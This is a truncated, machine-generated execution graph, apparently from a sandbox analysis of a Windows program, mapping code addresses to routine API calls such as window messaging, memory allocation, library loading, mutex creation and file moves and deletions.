                                                                                    execution_graph 52411 40cf00 52412 40cf12 52411->52412 52413 40cf0d 52411->52413 52415 406f50 CloseHandle 52413->52415 52415->52412 52416 402584 52417 402598 52416->52417 52418 4025ab 52416->52418 52446 4019cc RtlInitializeCriticalSection RtlEnterCriticalSection LocalAlloc RtlLeaveCriticalSection 52417->52446 52420 4025c2 RtlEnterCriticalSection 52418->52420 52421 4025cc 52418->52421 52420->52421 52432 4023b4 13 API calls 52421->52432 52423 40259d 52423->52418 52425 4025a1 52423->52425 52424 4025d5 52426 4025d9 52424->52426 52433 402088 52424->52433 52429 402635 52426->52429 52430 40262b RtlLeaveCriticalSection 52426->52430 52428 4025e5 52428->52426 52447 402210 9 API calls 52428->52447 52430->52429 52432->52424 52434 40209c 52433->52434 52435 4020af 52433->52435 52454 4019cc RtlInitializeCriticalSection RtlEnterCriticalSection LocalAlloc RtlLeaveCriticalSection 52434->52454 52437 4020d0 52435->52437 52438 4020c6 RtlEnterCriticalSection 52435->52438 52443 402106 52437->52443 52448 401f94 52437->52448 52438->52437 52439 4020a1 52439->52435 52440 4020a5 52439->52440 52440->52443 52443->52428 52444 4021f1 RtlLeaveCriticalSection 52445 4021fb 52444->52445 52445->52428 52446->52423 52447->52426 52449 401fa4 52448->52449 52450 401fd0 52449->52450 52453 401ff4 52449->52453 52455 401f0c 52449->52455 52450->52453 52460 401db4 52450->52460 52453->52444 52453->52445 52454->52439 52464 40178c 52455->52464 52458 401f29 52458->52449 52461 401e02 52460->52461 52462 401dd2 52460->52462 52461->52462 52487 401d1c 52461->52487 52462->52453 52467 4017a8 52464->52467 52466 4017b2 52483 401678 VirtualAlloc 52466->52483 52467->52466 52469 40180f 52467->52469 52472 401803 52467->52472 52475 4014e4 52467->52475 52484 4013e0 LocalAlloc 52467->52484 52469->52458 52474 401e80 9 API calls 52469->52474 52471 4017be 52471->52469 52485 4015c0 VirtualFree 52472->52485 52474->52458 52476 4014f3 VirtualAlloc 52475->52476 52478 401520 52476->52478 52479 401543 52476->52479 52486 401398 LocalAlloc 52478->52486 52479->52467 52481 40152c 52481->52479 52482 401530 VirtualFree 52481->52482 52482->52479 52483->52471 52484->52467 52485->52469 52486->52481 52488 401d2e 52487->52488 52489 401d51 52488->52489 52490 401d63 52488->52490 52500 401940 52489->52500 52492 401940 3 API calls 52490->52492 52493 401d61 52492->52493 52499 401d79 52493->52499 52510 401bf8 9 API calls 52493->52510 52495 401d88 52496 401da2 52495->52496 52511 401c4c 9 API calls 52495->52511 52512 401454 LocalAlloc 52496->52512 52499->52462 52501 401966 52500->52501 52502 4019bf 52500->52502 52513 40170c 52501->52513 52502->52493 52506 401983 52507 40199a 52506->52507 52518 4015c0 VirtualFree 52506->52518 52507->52502 52519 401454 LocalAlloc 52507->52519 52510->52495 52511->52496 52512->52499 52515 401743 52513->52515 52514 401783 52517 4013e0 LocalAlloc 52514->52517 52515->52514 52516 40175d VirtualFree 52515->52516 52516->52515 52517->52506 52518->52507 52519->52502 52520 41364c SetWindowLongA GetWindowLongA 52521 4136a9 SetPropA SetPropA 52520->52521 52522 41368b GetWindowLongA 52520->52522 52526 41f3ac 52521->52526 52522->52521 52523 41369a SetWindowLongA 52522->52523 52523->52521 52531 415280 52526->52531 52538 423c1c 52526->52538 52632 423a94 52526->52632 52527 4136f9 52532 41528d 52531->52532 52533 4152f3 52532->52533 52534 4152e8 52532->52534 52537 4152f1 52532->52537 52639 424b9c 13 API calls 52533->52639 52534->52537 52640 41506c 46 API calls 52534->52640 52537->52527 52543 423c52 52538->52543 52541 423cfc 52544 423d03 52541->52544 52545 423d37 52541->52545 52542 423c9d 52546 423ca3 52542->52546 52547 423d60 52542->52547 52557 423c73 52543->52557 52641 423b78 52543->52641 52548 423d09 52544->52548 52591 423fc1 52544->52591 52551 423d42 52545->52551 52552 4240aa IsIconic 52545->52552 52549 423cd5 52546->52549 52550 423ca8 52546->52550 52553 423d72 52547->52553 52554 423d7b 52547->52554 52555 423f23 SendMessageA 52548->52555 52556 423d17 52548->52556 52549->52557 52581 423cee 52549->52581 52582 423e4f 52549->52582 52559 423e06 52550->52559 52560 423cae 52550->52560 52561 4240e6 52551->52561 52562 423d4b 52551->52562 52552->52557 52558 4240be GetFocus 52552->52558 52563 423d88 52553->52563 52564 423d79 52553->52564 52656 4241a4 11 API calls 52554->52656 52555->52557 52556->52557 52583 423cd0 52556->52583 52612 423f66 52556->52612 52557->52527 52558->52557 52569 4240cf 52558->52569 52669 423b94 NtdllDefWindowProc_A 52559->52669 52570 423cb7 52560->52570 52571 423e2e PostMessageA 52560->52571 52689 424860 WinHelpA PostMessageA 52561->52689 52567 4240fd 52562->52567 52562->52583 52657 4241ec IsIconic 52563->52657 52665 423b94 NtdllDefWindowProc_A 52564->52665 52579 424106 52567->52579 52580 42411b 52567->52580 52688 41f004 GetCurrentThreadId 73A15940 52569->52688 52576 423cc0 52570->52576 52577 423eb5 52570->52577 52675 423b94 NtdllDefWindowProc_A 52571->52675 52586 423cc9 52576->52586 52587 423dde IsIconic 52576->52587 52588 423ebe 52577->52588 52589 423eef 52577->52589 52578 423e49 52578->52557 52690 4244e4 52579->52690 52696 42453c LocalAlloc TlsSetValue TlsGetValue TlsGetValue SendMessageA 52580->52696 52581->52583 52592 423e1b 52581->52592 52645 423b94 NtdllDefWindowProc_A 52582->52645 52583->52557 52655 423b94 NtdllDefWindowProc_A 52583->52655 52585 4240d6 52585->52557 52600 4240de SetFocus 52585->52600 52586->52583 52601 423da1 52586->52601 52594 423dfa 52587->52594 52595 423dee 52587->52595 52602 423b24 5 API calls 52588->52602 52652 423b94 NtdllDefWindowProc_A 52589->52652 52591->52557 52603 423fe7 IsWindowEnabled 52591->52603 52670 424188 52592->52670 52668 423b94 NtdllDefWindowProc_A 52594->52668 52667 423bd0 15 API calls 52595->52667 52599 423e55 52607 423e93 52599->52607 52608 423e71 52599->52608 52600->52557 52601->52557 52666 422c5c ShowWindow PostMessageA PostQuitMessage 52601->52666 52609 423ec6 52602->52609 52603->52557 52610 423ff5 52603->52610 52606 423ef5 52611 423f0d 52606->52611 52653 41eeb4 GetCurrentThreadId 73A15940 52606->52653 52614 423a94 6 API calls 52607->52614 52646 423b24 52608->52646 52616 423ed8 52609->52616 52676 41ef68 52609->52676 52624 423ffc IsWindowVisible 52610->52624 52619 423a94 6 API calls 52611->52619 52612->52557 52620 423f88 IsWindowEnabled 52612->52620 52622 423e9b PostMessageA 52614->52622 52682 423b94 NtdllDefWindowProc_A 52616->52682 52619->52557 52620->52557 52625 423f96 52620->52625 52622->52557 52624->52557 52626 42400a GetFocus 52624->52626 52683 412320 7 API calls 52625->52683 52684 4181f0 52626->52684 52629 42401f SetFocus 52686 415250 52629->52686 52633 423b1d 52632->52633 52634 423aa4 52632->52634 52633->52527 52634->52633 52635 423aaa EnumWindows 52634->52635 52635->52633 52636 423ac6 GetWindow GetWindowLongA 52635->52636 52828 423a2c GetWindow 52635->52828 52637 423ae5 52636->52637 52637->52633 52638 423b11 SetWindowPos 52637->52638 52638->52633 52638->52637 52639->52537 52640->52537 52642 423b82 52641->52642 52643 423b8d 52641->52643 52642->52643 52697 408728 GetSystemDefaultLCID 52642->52697 52643->52541 52643->52542 52645->52599 52647 423b72 PostMessageA 52646->52647 52649 423b33 52646->52649 52647->52557 52648 423b6a 52800 40b3d8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 52648->52800 52649->52647 52649->52648 52651 423b5e SetWindowPos 52649->52651 52651->52648 52651->52649 52652->52606 52654 41ef39 52653->52654 52654->52611 52655->52557 52656->52557 52658 4241fd SetActiveWindow 52657->52658 52663 424233 52657->52663 52801 42365c 52658->52801 52661 423b24 5 API calls 52662 42421a 52661->52662 52662->52663 52664 42422d SetFocus 52662->52664 52663->52557 52664->52663 52665->52557 52666->52557 52667->52557 52668->52557 52669->52557 52813 41db40 52670->52813 52673 4241a0 52673->52557 52674 424194 LoadIconA 52674->52673 52675->52578 52677 41ef70 IsWindow 52676->52677 52678 41ef9c 52676->52678 52679 41ef8a 52677->52679 52680 41ef7f EnableWindow 52677->52680 52678->52616 52679->52677 52679->52678 52681 402660 4 API calls 52679->52681 52680->52679 52681->52679 52682->52557 52683->52557 52685 4181fa 52684->52685 52685->52629 52687 41526b SetFocus 52686->52687 52687->52557 52688->52585 52689->52578 52691 4244f0 52690->52691 52692 42450a 52690->52692 52693 42451f 52691->52693 52694 4244f7 SendMessageA 52691->52694 52695 402648 4 API calls 52692->52695 52693->52557 52694->52693 52695->52693 52696->52578 52752 408570 GetLocaleInfoA 52697->52752 52702 408570 5 API calls 52703 40877d 52702->52703 52704 408570 5 API calls 52703->52704 52705 4087a1 52704->52705 52764 4085bc GetLocaleInfoA 52705->52764 52708 4085bc GetLocaleInfoA 52709 4087d1 52708->52709 52710 408570 5 API calls 52709->52710 52711 4087eb 52710->52711 52712 4085bc GetLocaleInfoA 52711->52712 52713 408808 52712->52713 52714 408570 5 API calls 52713->52714 52715 408822 52714->52715 52716 403450 4 API calls 52715->52716 52717 40882f 52716->52717 52718 408570 5 API calls 52717->52718 52719 408844 52718->52719 52720 403450 4 API calls 52719->52720 52721 408851 52720->52721 52722 4085bc GetLocaleInfoA 52721->52722 52723 40885f 52722->52723 52724 408570 5 API calls 52723->52724 52725 408879 52724->52725 52726 403450 4 API calls 52725->52726 52727 408886 52726->52727 52728 408570 5 API calls 52727->52728 52753 408597 52752->52753 52754 4085a9 52752->52754 52780 4034e0 52753->52780 52756 403494 4 API calls 52754->52756 52757 4085a7 52756->52757 52758 403450 52757->52758 52760 403464 52758->52760 52761 403454 52758->52761 52759 403490 52759->52702 52760->52759 52795 402660 52760->52795 52761->52760 52762 4034bc 4 API calls 52761->52762 52762->52760 52765 4085d8 52764->52765 52765->52708 52785 4034bc 52780->52785 52782 4034f0 52783 403400 4 API calls 52782->52783 52784 403508 52783->52784 52784->52757 52786 4034c0 52785->52786 52787 4034dc 52785->52787 52790 402648 52786->52790 52787->52782 52789 4034c9 52789->52782 52791 40264c 52790->52791 52792 402656 52790->52792 52791->52792 52794 4033bc LocalAlloc TlsSetValue TlsGetValue TlsGetValue 52791->52794 52792->52789 52792->52792 52794->52792 52796 402664 52795->52796 52797 40266e 52795->52797 52796->52797 52799 4033bc LocalAlloc TlsSetValue TlsGetValue TlsGetValue 52796->52799 52797->52759 52797->52797 52799->52797 52800->52647 52809 423608 SystemParametersInfoA 52801->52809 52804 423675 ShowWindow 52806 423680 52804->52806 52807 423687 52804->52807 52812 423638 SystemParametersInfoA 52806->52812 52807->52661 52810 423626 52809->52810 52810->52804 52811 423638 SystemParametersInfoA 52810->52811 52811->52804 52812->52807 52816 41db64 52813->52816 52817 41db71 52816->52817 52823 41db4a 52816->52823 52817->52823 52825 40cc80 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 52817->52825 52819 41db8e 52820 41dba8 52819->52820 52821 41db9b 52819->52821 52819->52823 52826 41bd9c 11 API calls 52820->52826 52827 41b398 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 52821->52827 52823->52673 52823->52674 52825->52819 52826->52823 52827->52823 52829 423a4d GetWindowLongA 52828->52829 52830 423a59 52828->52830 52829->52830 52831 490c98 52832 490ccc 52831->52832 52833 490cce 52832->52833 52834 490ce2 52832->52834 52977 4467f0 18 API calls 52833->52977 52837 490d1e 52834->52837 52838 490cf1 52834->52838 52836 490cd7 Sleep 52894 490d55 52836->52894 52843 490d5a 52837->52843 52844 490d2d 52837->52844 52839 44684c 18 API calls 52838->52839 52842 490d00 52839->52842 52845 490d08 FindWindowA 52842->52845 52849 490d69 52843->52849 52850 490db0 52843->52850 52967 44684c 52844->52967 52848 446acc 5 API calls 52845->52848 52847 490d3a 52851 490d42 FindWindowA 52847->52851 52887 490d19 52848->52887 52978 4467f0 18 API calls 52849->52978 52855 490e0c 52850->52855 52856 490dbf 52850->52856 52971 446acc 52851->52971 52854 490d75 52979 4467f0 18 API calls 52854->52979 52862 490e68 52855->52862 52863 490e1b 52855->52863 52982 4467f0 18 API calls 52856->52982 52859 490d82 52980 4467f0 18 API calls 52859->52980 52860 490dcb 52983 4467f0 18 API calls 52860->52983 52873 490ea2 52862->52873 52874 490e77 52862->52874 52987 4467f0 18 API calls 52863->52987 52865 490d8f 52981 4467f0 18 API calls 52865->52981 52867 490dd8 52984 4467f0 18 API calls 52867->52984 52869 490d9a SendMessageA 52872 446acc 5 API calls 52869->52872 52870 490e27 52988 4467f0 18 API calls 52870->52988 52872->52887 52884 490eb1 52873->52884 52885 490ef0 52873->52885 52877 44684c 18 API calls 52874->52877 52876 490de5 52985 4467f0 18 API calls 52876->52985 52880 490e84 52877->52880 52878 490e34 52989 4467f0 18 API calls 52878->52989 52888 490e8c RegisterClipboardFormatA 52880->52888 52882 490df0 PostMessageA 52986 446924 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 52882->52986 52883 490e41 52990 4467f0 18 API calls 52883->52990 52992 4467f0 18 API calls 52884->52992 52895 490eff 52885->52895 52896 490f44 52885->52896 52887->52894 52891 446acc 5 API calls 52888->52891 52891->52894 52892 490e4c SendNotifyMessageA 52991 446924 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 52892->52991 52893 490ebd 52993 4467f0 18 API calls 52893->52993 53017 403420 52894->53017 52995 4467f0 18 API calls 52895->52995 52904 490f98 52896->52904 52905 490f53 52896->52905 52899 490eca 52994 4467f0 18 API calls 52899->52994 52902 490f0b 52996 4467f0 18 API calls 52902->52996 52903 490ed5 SendMessageA 52907 446acc 5 API calls 52903->52907 52912 490ffa 52904->52912 52913 490fa7 52904->52913 52999 4467f0 18 API calls 52905->52999 52907->52887 52909 490f18 52997 4467f0 18 API calls 52909->52997 52910 490f5f 53000 4467f0 18 API calls 52910->53000 52921 491009 52912->52921 52922 491081 52912->52922 52916 44684c 18 API calls 52913->52916 52915 490f23 PostMessageA 52998 446924 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 52915->52998 52919 490fb4 52916->52919 52917 490f6c 53001 4467f0 18 API calls 52917->53001 53003 42e2bc SetErrorMode 52919->53003 52925 44684c 18 API calls 52921->52925 52932 491090 52922->52932 52933 4910b6 52922->52933 52924 490f77 SendNotifyMessageA 53002 446924 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 52924->53002 52928 491018 52925->52928 52926 490fc1 52929 490fd7 GetLastError 52926->52929 52930 490fc7 52926->52930 53006 4467f0 18 API calls 52928->53006 52934 446acc 5 API calls 52929->52934 52931 446acc 5 API calls 52930->52931 52935 490fd5 52931->52935 53011 4467f0 18 API calls 52932->53011 52940 4910e8 52933->52940 52941 4910c5 52933->52941 52934->52935 52939 446acc 5 API calls 52935->52939 52938 49109a FreeLibrary 53012 446924 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 52938->53012 52939->52894 52950 4910f7 52940->52950 52956 49112b 52940->52956 52944 44684c 18 API calls 52941->52944 52942 49102b GetProcAddress 52945 491071 52942->52945 52946 491037 52942->52946 52947 4910d1 52944->52947 53010 446924 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 52945->53010 53007 4467f0 18 API calls 52946->53007 52952 4910d9 CreateMutexA 52947->52952 53013 48ae84 18 API calls 52950->53013 52951 491043 53008 4467f0 18 API calls 52951->53008 52952->52894 52955 491050 52959 446acc 5 API calls 52955->52959 52956->52894 53015 48ae84 18 API calls 52956->53015 52958 491103 52960 491114 OemToCharBuffA 52958->52960 52961 491061 52959->52961 53014 48ae9c LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 52960->53014 53009 446924 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 52961->53009 52964 491146 52965 491157 CharToOemBuffA 52964->52965 53016 48ae9c LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 52965->53016 52968 446854 52967->52968 53021 4358cc 52968->53021 52970 446873 52970->52847 52972 446ad4 52971->52972 53047 435c34 VariantClear 52972->53047 52974 446af7 52975 446b0e 52974->52975 53048 408c14 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 52974->53048 52975->52894 52977->52836 52978->52854 52979->52859 52980->52865 52981->52869 52982->52860 52983->52867 52984->52876 52985->52882 52986->52887 52987->52870 52988->52878 52989->52883 52990->52892 52991->52894 52992->52893 52993->52899 52994->52903 52995->52902 52996->52909 52997->52915 52998->52887 52999->52910 53000->52917 53001->52924 53002->52894 53049 403738 53003->53049 53006->52942 53007->52951 53008->52955 53009->52887 53010->52887 53011->52938 53012->52894 53013->52958 53014->52894 53015->52964 53016->52894 53019 403426 53017->53019 53018 40344b 53019->53018 53020 402660 4 API calls 53019->53020 53020->53019 53022 4358d8 53021->53022 53023 4358fa 53021->53023 53022->53023 53041 408c14 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53022->53041 53024 43597d 53023->53024 53026 435941 53023->53026 53027 435971 53023->53027 53028 435965 53023->53028 53029 435959 53023->53029 53030 43594d 53023->53030 53046 408c14 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53024->53046 53042 403510 53026->53042 53045 4040e8 18 API calls 53027->53045 53032 403494 4 API calls 53028->53032 53029->52970 53036 403510 4 API calls 53030->53036 53038 43596e 53032->53038 53035 43598e 53035->52970 53037 435956 53036->53037 53037->52970 53038->52970 53039 43597a 53039->52970 53041->53023 53043 4034e0 4 API calls 53042->53043 53044 40351d 53043->53044 53044->52970 53045->53039 53046->53035 53047->52974 53048->52975 53050 40373c LoadLibraryA 53049->53050 53050->52926 53051 416b52 53052 416bfa 53051->53052 53053 416b6a 53051->53053 53070 41532c LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53052->53070 53055 416b84 SendMessageA 53053->53055 53056 416b78 53053->53056 53066 416bd8 53055->53066 53057 416b82 CallWindowProcA 53056->53057 53058 416b9e 53056->53058 53057->53066 53067 41a068 GetSysColor 53058->53067 53061 416ba9 SetTextColor 53062 416bbe 53061->53062 53068 41a068 GetSysColor 53062->53068 53064 416bc3 SetBkColor 53069 41a6f0 GetSysColor CreateBrushIndirect 53064->53069 53067->53061 53068->53064 53069->53066 53070->53066 53071 416654 53072 416661 53071->53072 53073 4166bb 53071->53073 53078 416560 CreateWindowExA 53072->53078 53074 416668 SetPropA SetPropA 53074->53073 53075 41669b 53074->53075 53076 4166ae SetWindowPos 53075->53076 53076->53073 53078->53074 53079 42e317 SetErrorMode 53080 42f394 53081 42f3a3 NtdllDefWindowProc_A 53080->53081 53082 42f39f 53080->53082 53081->53082 53083 4162da 53084 416306 53083->53084 53085 4162e6 GetClassInfoA 53083->53085 53085->53084 53086 4162fa GetClassInfoA 53085->53086 53086->53084 53087 48fed4 53088 48ff0e 53087->53088 53089 48ff1a 53088->53089 53090 48ff10 53088->53090 53092 48ff29 53089->53092 53093 48ff52 53089->53093 53282 4090a0 MessageBeep 53090->53282 53094 44684c 18 API calls 53092->53094 53100 48ff8a 53093->53100 53101 48ff61 53093->53101 53097 48ff36 53094->53097 53095 403420 4 API calls 53096 490566 53095->53096 53098 403400 4 API calls 53096->53098 53283 406bb8 53097->53283 53102 49056e 53098->53102 53107 48ff99 53100->53107 53108 48ffc2 53100->53108 53104 44684c 18 API calls 53101->53104 53106 48ff6e 53104->53106 53291 406c08 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53106->53291 53110 44684c 18 API calls 53107->53110 53115 48ffea 53108->53115 53116 48ffd1 53108->53116 53112 48ffa6 53110->53112 53111 48ff79 53292 446ba0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 53111->53292 53293 406c3c LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53112->53293 53122 48fff9 53115->53122 53123 49001e 53115->53123 53295 407288 LocalAlloc TlsSetValue TlsGetValue TlsGetValue GetCurrentDirectoryA 53116->53295 53117 48ffb1 53294 446ba0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 53117->53294 53119 48ffd9 53296 446ba0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 53119->53296 53124 44684c 18 API calls 53122->53124 53126 49002d 53123->53126 53127 490056 53123->53127 53125 490006 53124->53125 53297 4072b0 53125->53297 53129 44684c 18 API calls 53126->53129 53134 49008e 53127->53134 53135 490065 53127->53135 53131 49003a 53129->53131 53130 49000e 53300 446924 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 53130->53300 53301 42c7d0 53131->53301 53140 4900da 53134->53140 53141 49009d 53134->53141 53137 44684c 18 API calls 53135->53137 53139 490072 53137->53139 53311 407200 8 API calls 53139->53311 53147 4900e9 53140->53147 53151 490112 53140->53151 53143 44684c 18 API calls 53141->53143 53145 4900ac 53143->53145 53144 49007d 53312 446ba0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 53144->53312 53149 44684c 18 API calls 53145->53149 53150 44684c 18 API calls 53147->53150 53148 48ff15 53148->53095 53152 4900bd 53149->53152 53153 4900f6 53150->53153 53156 49014a 53151->53156 53157 490121 53151->53157 53313 48fbd8 8 API calls 53152->53313 53315 42c870 53153->53315 53164 490159 53156->53164 53165 490182 53156->53165 53160 44684c 18 API calls 53157->53160 53158 4900c9 53314 446ba0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 53158->53314 53163 49012e 53160->53163 53321 42c898 53163->53321 53167 44684c 18 API calls 53164->53167 53172 4901ba 53165->53172 53173 490191 53165->53173 53169 490166 53167->53169 53330 42c8c8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue IsDBCSLeadByte 53169->53330 53179 4901c9 53172->53179 53180 4901f2 53172->53180 53175 44684c 18 API calls 53173->53175 53174 490171 53331 446ba0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 53174->53331 53176 49019e 53175->53176 53332 42c8f8 53176->53332 53182 44684c 18 API calls 53179->53182 53185 49023e 53180->53185 53186 490201 53180->53186 53184 4901d6 53182->53184 53338 42c920 53184->53338 53193 49024d 53185->53193 53194 490290 53185->53194 53188 44684c 18 API calls 53186->53188 53190 490210 53188->53190 53192 44684c 18 API calls 53190->53192 53195 490221 53192->53195 53196 44684c 18 API calls 53193->53196 53201 49029f 53194->53201 53202 490303 53194->53202 53344 42c4c4 LocalAlloc TlsSetValue TlsGetValue TlsGetValue IsDBCSLeadByte 53195->53344 53197 490260 53196->53197 53199 44684c 18 API calls 53197->53199 53203 490271 53199->53203 53200 49022d 53345 446ba0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 53200->53345 53205 44684c 18 API calls 53201->53205 53209 490342 53202->53209 53210 490312 53202->53210 53346 48fdd0 12 API calls 53203->53346 53207 4902ac 53205->53207 53274 42c5d4 7 API calls 53207->53274 53208 49027f 53347 446ba0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 53208->53347 53219 490381 53209->53219 53220 490351 53209->53220 53213 44684c 18 API calls 53210->53213 53215 49031f 53213->53215 53214 4902ba 53216 4902be 53214->53216 53217 4902f3 53214->53217 53350 451f68 53215->53350 53218 44684c 18 API calls 53216->53218 53349 446924 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 53217->53349 53224 4902cd 53218->53224 53229 4903c0 53219->53229 53230 490390 53219->53230 53225 44684c 18 API calls 53220->53225 53223 49032c 53357 446924 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 53223->53357 53275 4522e0 53224->53275 53228 49035e 53225->53228 53358 451dd0 53228->53358 53239 490408 53229->53239 53240 4903cf 53229->53240 53233 44684c 18 API calls 53230->53233 53231 4902dd 53348 446924 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 53231->53348 53236 49039d 53233->53236 53235 49036b 53365 446924 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 53235->53365 53366 452470 Wow64DisableWow64FsRedirection SetLastError Wow64RevertWow64FsRedirection RemoveDirectoryA GetLastError 53236->53366 53245 490450 53239->53245 53246 490417 53239->53246 53242 44684c 18 API calls 53240->53242 53241 4903aa 53367 446924 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 53241->53367 53244 4903de 53242->53244 53247 44684c 18 API calls 53244->53247 53251 490463 53245->53251 53258 490519 53245->53258 53248 44684c 18 API calls 53246->53248 53249 4903ef 53247->53249 53250 490426 53248->53250 53253 446acc 5 API calls 53249->53253 53252 44684c 18 API calls 53250->53252 53254 44684c 18 API calls 53251->53254 53255 490437 53252->53255 53253->53148 53256 490490 53254->53256 53261 446acc 5 API calls 53255->53261 53257 44684c 18 API calls 53256->53257 53259 4904a7 53257->53259 53258->53148 53371 4467f0 18 API calls 53258->53371 53368 407de4 7 API calls 53259->53368 53261->53148 53262 490532 53372 42e73c FormatMessageA 53262->53372 53267 4904c9 53268 44684c 18 API calls 53267->53268 53269 4904dd 53268->53269 53369 408510 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53269->53369 53271 4904e8 53370 446ba0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 53271->53370 53273 4904f4 53274->53214 53377 451d84 53275->53377 53277 4522f9 53278 4522fd 53277->53278 53279 452321 MoveFileA GetLastError 53277->53279 53278->53231 53383 451dc0 53279->53383 53282->53148 53284 406bc7 53283->53284 53285 406be0 53284->53285 53286 406be9 53284->53286 53287 403400 4 API calls 53285->53287 53386 403778 53286->53386 53288 406be7 53287->53288 53290 446ba0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 53288->53290 53290->53148 53291->53111 53292->53148 53293->53117 53294->53148 53295->53119 53296->53148 53298 403738 53297->53298 53299 4072ba SetCurrentDirectoryA 53298->53299 53299->53130 53300->53148 53302 403738 53301->53302 53303 42c7f3 GetFullPathNameA 53302->53303 53304 42c816 53303->53304 53305 42c7ff 53303->53305 53307 403494 4 API calls 53304->53307 53305->53304 53306 42c807 53305->53306 53308 4034e0 4 API calls 53306->53308 53309 42c814 53307->53309 53308->53309 53310 446ba0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 53309->53310 53310->53148 53311->53144 53312->53148 53313->53158 53314->53148 53393 42c768 53315->53393 53318 403778 4 API calls 53319 42c891 53318->53319 53320 446ba0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 53319->53320 53320->53148 53408 42c640 53321->53408 53324 42c8b5 53327 403778 4 API calls 53324->53327 53325 42c8ac 53326 403400 4 API calls 53325->53326 53328 42c8b3 53326->53328 53327->53328 53329 446ba0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 53328->53329 53329->53148 53330->53174 53331->53148 53333 42c768 IsDBCSLeadByte 53332->53333 53334 42c908 53333->53334 53335 403778 4 API calls 53334->53335 53336 42c91a 53335->53336 53337 446ba0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 53336->53337 53337->53148 53339 42c768 IsDBCSLeadByte 53338->53339 53340 42c930 53339->53340 53341 403778 4 API calls 53340->53341 53342 42c941 53341->53342 53343 446ba0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 53342->53343 53343->53148 53344->53200 53345->53148 53346->53208 53347->53148 53348->53148 53349->53148 53351 451d84 2 API calls 53350->53351 53352 451f7e 53351->53352 53353 451f82 53352->53353 53354 451f9e DeleteFileA GetLastError 53352->53354 53353->53223 53355 451dc0 Wow64RevertWow64FsRedirection 53354->53355 53356 451fc4 53355->53356 53356->53223 53357->53148 53359 451d84 2 API calls 53358->53359 53360 451de6 53359->53360 53361 451dea 53360->53361 53362 451e08 CreateDirectoryA GetLastError 53360->53362 53361->53235 53363 451dc0 Wow64RevertWow64FsRedirection 53362->53363 53364 451e2e 53363->53364 53364->53235 53365->53148 53366->53241 53367->53148 53368->53267 53369->53271 53370->53273 53371->53262 53373 42e762 53372->53373 53374 4034e0 4 API calls 53373->53374 53375 42e77f 53374->53375 53376 446ba0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 53375->53376 53376->53148 53378 451d92 53377->53378 53379 451d8e 53377->53379 53380 451db4 SetLastError 53378->53380 53381 451d9b Wow64DisableWow64FsRedirection 53378->53381 53379->53277 53382 451daf 53380->53382 53381->53382 53382->53277 53384 451dc5 Wow64RevertWow64FsRedirection 53383->53384 53385 451dcf 53383->53385 53384->53385 53385->53231 53387 4037aa 53386->53387 53389 40377d 53386->53389 53388 403400 4 API calls 53387->53388 53392 4037a0 53388->53392 53389->53387 53390 403791 53389->53390 53391 4034e0 4 API calls 53390->53391 53391->53392 53392->53288 53398 42c648 53393->53398 53395 42c7c7 53395->53318 53396 42c77d 53396->53395 53405 42c454 IsDBCSLeadByte 53396->53405 53401 42c659 53398->53401 53399 42c6bd 53402 42c6b8 53399->53402 53407 42c454 IsDBCSLeadByte 53399->53407 53401->53399 53404 42c677 53401->53404 53402->53396 53404->53402 53406 42c454 IsDBCSLeadByte 53404->53406 53405->53396 53406->53404 53407->53402 53409 42c648 IsDBCSLeadByte 53408->53409 53410 42c647 53409->53410 53410->53324 53410->53325 53411 46ad18 53412 46ad4e 53411->53412 53446 46b037 53411->53446 53413 46ad8a 53412->53413 53416 46add4 53412->53416 53417 46ade5 53412->53417 53418 46adb2 53412->53418 53419 46adc3 53412->53419 53420 46ada1 53412->53420 53413->53446 53506 4683b4 53413->53506 53414 403400 4 API calls 53421 46b071 53414->53421 53687 46aa98 67 API calls 53416->53687 53688 46aca8 45 API calls 53417->53688 53686 46a790 42 API calls 53418->53686 53471 46a8d8 53419->53471 53451 46a628 53420->53451 53422 403400 4 API calls 53421->53422 53428 46b079 53422->53428 53429 46ae1e 53442 46ae60 53429->53442 53429->53446 53689 493200 53429->53689 53432 46af71 53708 481938 123 API calls 53432->53708 53435 46af84 53435->53446 53436 